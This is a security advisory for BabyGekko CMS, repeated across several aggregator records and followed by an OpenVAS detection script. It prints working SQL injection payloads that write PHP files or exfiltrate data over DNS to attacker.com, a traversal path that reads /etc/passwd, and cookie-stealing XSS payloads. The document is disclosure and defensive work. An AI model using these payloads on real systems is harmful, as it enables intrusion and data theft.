High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BabyGekko, which can be exploited to include local PHP files, perform SQL Injection and Cross-Site Scripting (XSS) attacks.
1) Multiple SQL Injections in BabyGekko: CVE-2012-5698
Two SQL injections exist in BabyGekko administrator's panel but their exploitation demands administrator's privileges. However they can also be exploited by a non-authenticated malicious user via CSRF vector, because "/admin/index.php" script is also vulnerable to CSRF attack. In order to do so he has to make logged-in administrator visit a malicious page.
1.1 The vulnerability exists due to insufficient validation of input passed via the "keyword" parameter to "/admin/index.php" (when "app" is set to "users"). A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database.
The following PoC (Proof-of-Concept) will create (depending on web server and database permissions) a file "/tmp/.class.php" and writes "<?phpinfo()?>" into it:
http://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=1%27%29 %20UNION%20SELECT%201,2,3,4,5,6,7,8,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INT O%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20
The second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com", located on attacker controlled DNS server:
http://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) --
1.2 The vulnerability exists due to insufficient validation of input passed via the "query" parameter to "/admin/index.php". A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database.
The following PoC will create (depending on web server and database permissions) a file "/tmp/.class.php" and writes "<?phpinfo()?>" into it:
http://[host]/admin/index.php?app=html&action=getlistofusers&query=1%27%20un ion%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,%27% 3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20-- %202%20
The second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com", located on attacker controlled DNS server:
http://[host]/admin/index.php?app=html&action=getlistofusers&query=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) --
2) Local File Inclusion in BabyGekko: CVE-2012-5699
The vulnerability exists due to insufficient validation of input passed via the "app" parameter to "index.php". A remote attacker can include arbitrary files from local system using directory traversal sequences with NULL byte.
The following PoC will show the "/etc/passwd" file:
http://[host]/index.php?app=../../../../../../../etc/passwd%00
Second PoC demonstrates inclusion of "/tmp/.class.php" file created during exploitation of vulnerabilities 1.1 or 1.2. Depending on server configuration and permissions it will show the results of "phpinfo()" function execution:
http://[host]/index.php?app=../../../../../../../tmp/
3) Multiple Cross-Site Scripting (XSS) in BabyGekko: CVE-2012-5700
3.1 Input passed via the "id" parameter to "/admin/index.php" is not properly sanitized. A remote attacker can execute arbitrary HTML and script code in administrator's browser in context of vulnerable website.
The following PoC code demonstrates the vulnerability:
http://[host]/admin/index.php?app=templates&action=edititem&id=%22%3E%3Cscri pt%3Ealert%28document.cookie%29;%3C/script%3E
3.2 Insufficient sanitation of input passed via the "username" and "password" HTTP POST parameters to the "index.php" can be used to inject and execute arbitrary HTML and script code in user's browser in context of vulnerable website. Successful exploitation of this vulnerability requires "loginbox" block to be activated.
The following PoC code demonstrates the vulnerability:
<form action="http://[host]/index.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="username" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="password" value='"><script>alert(document.cookie);</script>' />
<input type="submit" id="btn">
</form>
{"id": "HTB23122", "type": "htbridge", "bulletinFamily": "software", "title": "Multiple vulnerabilities in BabyGekko", "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BabyGekko, which can be exploited to include local PHP files, perform SQL Injection and Cross-Site Scripting (XSS) attacks. \n \n1) Multiple SQL Injections in BabyGekko: CVE-2012-5698 \nTwo SQL injections exist in BabyGekko administrator's panel but their exploitation demands administrator's privileges. However they can also be exploited by a non-authenticated malicious user via CSRF vector, because \"/admin/index.php\" script is also vulnerable to CSRF attack. In order to do so he has to make logged-in administrator visit a malicious page. \n1.1 The vulnerability exists due to insufficient validation of input passed via the \"keyword\" parameter to \"/admin/index.php\" (when \"app\" is set to \"users\"). A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database. \nThe following PoC (Proof-of-Concept) will create (depending on web server and database permissions) a file \"/tmp/.class.php\" and writes \"<?phpinfo()?>\" into it: \nhttp://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=1%27%29 %20UNION%20SELECT%201,2,3,4,5,6,7,8,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INT O%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20 \nThe second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\", located on attacker controlled DNS server: \nhttp://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \n1.2 The vulnerability exists due to insufficient validation of input passed via the \"query\" parameter to \"/admin/index.php\". A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database. \nThe following PoC will create (depending on web server and database permissions) a file \"/tmp/.class.php\" and writes \"<?phpinfo()?>\" into it: \nhttp://[host]/admin/index.php?app=html&action=getlistofusers&query=1%27%20un ion%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,%27% 3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20-- %202%20 \nThe second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\", located on attacker controlled DNS server: \nhttp://[host]/admin/index.php?app=html&action=getlistofusers&query=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \n \n2) Local File Inclusion in BabyGekko: CVE-2012-5699 \nThe vulnerability exists due to insufficient validation of input passed via the \"app\" parameter to \"index.php\". A remote attacker can include arbitrary files from local system using directory traversal sequences with NULL byte. \nThe following PoC will show the \"/etc/passwd\" file: \nhttp://[host]/index.php?app=../../../../../../../etc/passwd%00 \nSecond PoC demonstrates inclusion of \"/tmp/.class.php\" file created during exploitation of vulnerabilities 1.1 or 1.2. Depending on server configuration and permissions it will show the results of \"phpinfo()\" function execution: \nhttp://[host]/index.php?app=../../../../../../../tmp/ \n \n3) Multiple Cross-Site Scripting (XSS) in BabyGekko: CVE-2012-5700 \n3.1 Input passed via the \"id\" parameter to \"/admin/index.php\" is not properly sanitized. A remote attacker can execute arbitrary HTML and script code in administrator's browser in context of vulnerable website. \nThe following PoC code demonstrates the vulnerability: \nhttp://[host]/admin/index.php?app=templates&action=edititem&id=%22%3E%3Cscri pt%3Ealert%28document.cookie%29;%3C/script%3E \n3.2 Insufficient sanitation of input passed via the \"username\" and \"password\" HTTP POST parameters to the \"index.php\" can be used to inject and execute arbitrary HTML and script code in user's browser in context of vulnerable website. Successful exploitation of this vulnerability requires \"loginbox\" block to be activated. \nThe following PoC code demonstrates the vulnerability: \n<form action=\"http://[host]/index.php\" method=\"post\" enctype=\"multipart/form-data\"> \n<input type=\"hidden\" name=\"username\" value='\"><script>alert(document.cookie);</script>' /> \n<input type=\"hidden\" name=\"password\" value='\"><script>alert(document.cookie);</script>' /> \n<input type=\"submit\" id=\"btn\"> \n</form>\n", "published": "2012-10-24T00:00:00", "modified": "2012-11-13T00:00:00", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/"}, "href": "https://www.htbridge.com/advisory/HTB23122", "reporter": "High-Tech Bridge", "references": [], "cvelist": ["CVE-2012-5698", "CVE-2012-5699", "CVE-2012-5700"], "lastseen": "2020-12-24T11:12:20", "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-5698", "CVE-2012-5699", "CVE-2012-5700"]}, {"type": "exploitdb", "idList": ["EDB-ID:22741"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9145E0A6A52571AC39EB4DAFB6BBCEE9"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310804856"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:118104"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28764", "SECURITYVULNS:VULN:12719"]}, {"type": "seebug", "idList": ["SSV:76538"]}]}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2012-5700"]}, {"type": "exploitdb", "idList": ["EDB-ID:22741"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9145E0A6A52571AC39EB4DAFB6BBCEE9"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12719"]}]}, "exploitation": null, "vulnersScore": 0.3}, "affectedSoftware": [{"version": "1.2.2e", "operator": "le", "name": "babygekko"}], "immutableFields": [], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "edition": 2, "scheme": null, "_state": {"dependencies": 1647589307, "score": 1659703426}}
{"exploitpack": [{"lastseen": "2020-04-01T19:04:06", "description": "\nBabyGekko 1.2.2e - Multiple Vulnerabilities", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2012-11-15T00:00:00", "title": "BabyGekko 1.2.2e - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5699", "CVE-2012-5698", "CVE-2012-5700"], "modified": "2012-11-15T00:00:00", "id": "EXPLOITPACK:9145E0A6A52571AC39EB4DAFB6BBCEE9", "href": "", "sourceData": "Advisory ID: HTB23122\nProduct: BabyGekko\nVendor: babygekko.com\nVulnerable Version(s): 1.2.2e and probably prior\nTested Version: 1.2.2e\nVendor Notification: October 24, 2012 \nVendor Patch: November 4, 2012 \nPublic Disclosure: November 14, 2012 \nVulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79]\nCVE References: CVE-2012-5698, CVE-2012-5699, CVE-2012-5700\nCVSSv2 Base Scores: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\nSolution Status: Fixed by Vendor\nRisk Level: High \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n\n-----------------------------------------------------------------------------------------------\n\nAdvisory Details:\n\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BabyGekko, which can be exploited to include local PHP files, perform SQL Injection and Cross-Site Scripting (XSS) attacks.\n\n\n1) Multiple SQL Injections in BabyGekko\n\nTwo SQL injections exist in BabyGekko administrator's panel but their exploitation demands administrator's privileges. However they can also be exploited by a non-authenticated malicious user via CSRF vector, because \"/admin/index.php\" script is also vulnerable to CSRF attack. In order to do so he has to make logged-in administrator visit a malicious page. \n\n1.1 The vulnerability exists due to insufficient validation of input passed via the \"keyword\" parameter to \"/admin/index.php\" (when \"app\" is set to \"users\"). A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database. \n\nThe following PoC (Proof-of-Concept) will create (depending on web server and database permissions) a file \"/tmp/.class.php\" and writes \"<?phpinfo()?>\" into it:\n\nhttp://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=1%27%29%20UNION%20SELECT%201,2,3,4,5,6,7,8,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20\n\nThe second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\", located on attacker controlled DNS server:\n\nhttp://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \n\n1.2 The vulnerability exists due to insufficient validation of input passed via the \"query\" parameter to \"/admin/index.php\". A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database.\n\nThe following PoC will create (depending on web server and database permissions) a file \"/tmp/.class.php\" and writes \"<?phpinfo()?>\" into it:\n\nhttp://[host]/admin/index.php?app=html&action=getlistofusers&query=1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20\n\nThe second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\", located on attacker controlled DNS server:\n\nhttp://[host]/admin/index.php?app=html&action=getlistofusers&query=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \n\n\n2) Local File Inclusion in BabyGekko\n\nThe vulnerability exists due to insufficient validation of input passed via the \"app\" parameter to \"index.php\". A remote attacker can include arbitrary files from local system using directory traversal sequences with NULL byte. \n\nThe following PoC will show the \"/etc/passwd\" file:\n\nhttp://[host]/index.php?app=../../../../../../../etc/passwd%00\n\nSecond PoC demonstrates inclusion of \"/tmp/.class.php\" file created during exploitation of vulnerabilities 1.1 or 1.2. Depending on server configuration and permissions it will show the results of \"phpinfo()\" function execution:\n\nhttp://[host]/index.php?app=../../../../../../../tmp/\n\n\n3) Multiple Cross-Site Scripting (XSS) in BabyGekko\n\n3.1 Input passed via the \"id\" parameter to \"/admin/index.php\" is not properly sanitized. A remote attacker can execute arbitrary HTML and script code in administrator's browser in context of vulnerable website.\n\nThe following PoC code demonstrates the vulnerability:\n\nhttp://[host]/admin/index.php?app=templates&action=edititem&id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\n\n3.2 Insufficient sanitation of input passed via the \"username\" and \"password\" HTTP POST parameters to the \"index.php\" can be used to inject and execute arbitrary HTML and script code in user's browser in context of vulnerable website. Successful exploitation of this vulnerability requires \"loginbox\" block to be activated.\n\nThe following PoC code demonstrates the vulnerability:\n\n\n<form action=\"http://[host]/index.php\" method=\"post\" enctype=\"multipart/form-data\">\n<input type=\"hidden\" name=\"username\" value='\"><script>alert(document.cookie);</script>' />\n<input type=\"hidden\" name=\"password\" value='\"><script>alert(document.cookie);</script>' />\n<input type=\"submit\" id=\"btn\">\n</form>\n\n\n-----------------------------------------------------------------------------------------------\n\nSolution:\n\nUpgrade to BabyGekko 1.2.2f or 1.2.4\n\nMore Information:\nhttp://www.babygekko.com/downloads/gekko_web_builder_v1.2.2f.zip\nhttp://www.babygekko.com/site/news/general/babygekko-v1-2-4-has-been-released.html\n\n-----------------------------------------------------------------------------------------------\n\nReferences:\n\n[1] High-Tech Bridge Advisory HTB23122 - https://www.htbridge.com/advisory/HTB23122 - Multiple vulnerabilities in BabyGekko.\n[2] BabyGekko - http://www.babygekko.com - BabyGekko strives to deliver high quality websites and other web content fast and easy for all end users. It is a lightweight, extensible content management system platform for publishing websites, intranets, or blogs.\n[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n\n-----------------------------------------------------------------------------------------------\n\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-05-08T19:05:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5699", "CVE-2012-5698", "CVE-2012-5700"], "description": "This host is running Baby Gekko CMS and is\n prone to multiple vulnerabilities.", "modified": "2020-05-06T00:00:00", "published": "2014-09-24T00:00:00", "id": "OPENVAS:1361412562310804856", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804856", "type": "openvas", "title": "Baby Gekko CMS Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Baby Gekko CMS Multiple Vulnerabilities\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804856\");\n script_version(\"2020-05-06T13:33:54+0000\");\n script_cve_id(\"CVE-2012-5698\", \"CVE-2012-5699\", \"CVE-2012-5700\");\n script_bugtraq_id(56523, 56523, 56523);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 13:33:54 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-09-24 14:10:24 +0530 (Wed, 24 Sep 2014)\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_name(\"Baby Gekko CMS Multiple Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Baby Gekko CMS and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP GET\n request and check whether it is able to read cookie or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple errors exists due to,\n\n - Insufficient validation of input passed via the 'keyword', 'query' and 'id'\n parameters to /admin/index.php script.\n\n - Insufficient validation of input passed via the 'app' parameter to index.php\n script.\n\n - Insufficient validation of input passed via the 'username' and 'password'\n HTTP POST parameters to the index.php script.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to inject or manipulate SQL queries in the back-end database and\n execute arbitrary HTML and script code in a user's browser session in the\n context of an affected site.\");\n\n script_tag(name:\"affected\", value:\"Baby Gekko CMS before version 1.2.2f\");\n\n script_tag(name:\"solution\", value:\"Upgrade to 1.2.2f, 1.2.4, or later.\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/22741\");\n script_xref(name:\"URL\", value:\"https://www.htbridge.com/advisory/HTB23122\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/118104\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"http://www.schlix.com\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nhttp_port = http_get_port(default:80);\n\nif(!http_can_host_php(port:http_port)){\n exit(0);\n}\n\nhost = http_host_name(port:http_port);\n\nforeach dir (make_list_unique(\"/\", \"/gekkocms\", \"/babygekko\", \"/cms\", \"/gekko\", http_cgi_dirs(port:http_port)))\n{\n\n if(dir == \"/\") dir = \"\";\n\n sndReq = http_get(item:string(dir, \"/admin/index.php\"), port:http_port);\n rcvRes = http_keepalive_send_recv(port:http_port, data:sndReq);\n\n if(rcvRes && \"Gekko CMS Administration<\" >< rcvRes)\n {\n\n sndReq = http_get(item:string(dir, \"/users/action/login\"), port:http_port);\n rcvRes = http_keepalive_send_recv(port:http_port, data:sndReq);\n\n cookie = eregmatch(pattern:\"Set-Cookie: ([0-9a-z]+=[0-9a-z]+);\", string:rcvRes);\n if(!cookie[1]){\n exit(0);\n }\n csrftoken = eregmatch(pattern:'csrftoken\" type=\"hidden\" value=\"([0-9a-z]*)\"', string:rcvRes);\n if(!csrftoken[1]){\n exit(0);\n }\n\n postData = string(\"-----------------------------769391821827878191354119224\\r\\n\",\n 'Content-Disposition: form-data; name=\"login\"\\r\\n',\n '\\r\\n login\\r\\n',\n '-----------------------------769391821827878191354119224\\r\\n',\n 'Content-Disposition: form-data; name=\"_csrftoken\"\\r\\n',\n '\\r\\n ', csrftoken[1], '\\r\\n',\n '-----------------------------769391821827878191354119224\\r\\n',\n 'Content-Disposition: form-data; name=\"username\"\\r\\n\\r\\n',\n '\"><script>alert(document.cookie);</script>\\r\\n',\n '-----------------------------769391821827878191354119224\\r\\n',\n 'Content-Disposition: form-data; name=\"password\"\\r\\n\\r\\n',\n '\"><script>alert(document.cookie);</script>\\r\\n',\n '-----------------------------769391821827878191354119224\\r\\n',\n 'Content-Disposition: form-data; name=\"submit\"\\r\\n\\r\\n',\n 'Submit\\r\\n',\n '-----------------------------769391821827878191354119224--\\r\\n');\n\n url = dir + \"/users/action/login\";\n\n #Send Attack Request\n sndReq = string(\"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Cookie: PHPSESSID=40c5tp269mdbo4a0au68ebsjc0;\", cookie[1], \"\\r\\n\",\n \"Content-Type: multipart/form-data;boundary=---------------------------769391821827878191354119224\\r\\n\",\n \"Content-Length: \", strlen(postData), \"\\r\\n\\r\\n\",\n \"\\r\\n\", postData, \"\\r\\n\");\n\n rcvRes = http_keepalive_send_recv(port:http_port, data:sndReq);\n\n if(rcvRes =~ \"^HTTP/1\\.[01] 200\" && \"><script>alert(document.cookie);</script>\" >< rcvRes &&\n \">Login<\" >< rcvRes && \">Baby Gekko\" >< rcvRes)\n {\n security_message(port:http_port);\n exit(0);\n }\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:04", "description": "", "published": "2012-11-15T00:00:00", "type": "packetstorm", "title": "BabyGekko 1.2.2e XSS / LFI / SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5699", "CVE-2012-5698", "CVE-2012-5700"], "modified": "2012-11-15T00:00:00", "id": "PACKETSTORM:118104", "href": "https://packetstormsecurity.com/files/118104/BabyGekko-1.2.2e-XSS-LFI-SQL-Injection.html", "sourceData": "`Advisory ID: HTB23122 \nProduct: BabyGekko \nVendor: babygekko.com \nVulnerable Version(s): 1.2.2e and probably prior \nTested Version: 1.2.2e \nVendor Notification: October 24, 2012 \nVendor Patch: November 4, 2012 \nPublic Disclosure: November 14, 2012 \nVulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79] \nCVE References: CVE-2012-5698, CVE-2012-5699, CVE-2012-5700 \nCVSSv2 Base Scores: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nRisk Level: High \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BabyGekko, which can be exploited to include local PHP files, perform SQL Injection and Cross-Site Scripting (XSS) attacks. \n \n \n1) Multiple SQL Injections in BabyGekko \n \nTwo SQL injections exist in BabyGekko administrator's panel but their exploitation demands administrator's privileges. However they can also be exploited by a non-authenticated malicious user via CSRF vector, because \"/admin/index.php\" script is also vulnerable to CSRF attack. In order to do so he has to make logged-in administrator visit a malicious page. \n \n1.1 The vulnerability exists due to insufficient validation of input passed via the \"keyword\" parameter to \"/admin/index.php\" (when \"app\" is set to \"users\"). A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database. \n \nThe following PoC (Proof-of-Concept) will create (depending on web server and database permissions) a file \"/tmp/.class.php\" and writes \"<?phpinfo()?>\" into it: \n \nhttp://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=1%27%29%20UNION%20SELECT%201,2,3,4,5,6,7,8,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20 \n \nThe second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\", located on attacker controlled DNS server: \n \nhttp://[host]/admin/index.php?app=users&ajax=1&action=search&keyword=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \n \n1.2 The vulnerability exists due to insufficient validation of input passed via the \"query\" parameter to \"/admin/index.php\". A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database. \n \nThe following PoC will create (depending on web server and database permissions) a file \"/tmp/.class.php\" and writes \"<?phpinfo()?>\" into it: \n \nhttp://[host]/admin/index.php?app=html&action=getlistofusers&query=1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20 \n \nThe second PoC code below is based on DNS Exfiltration technique and may 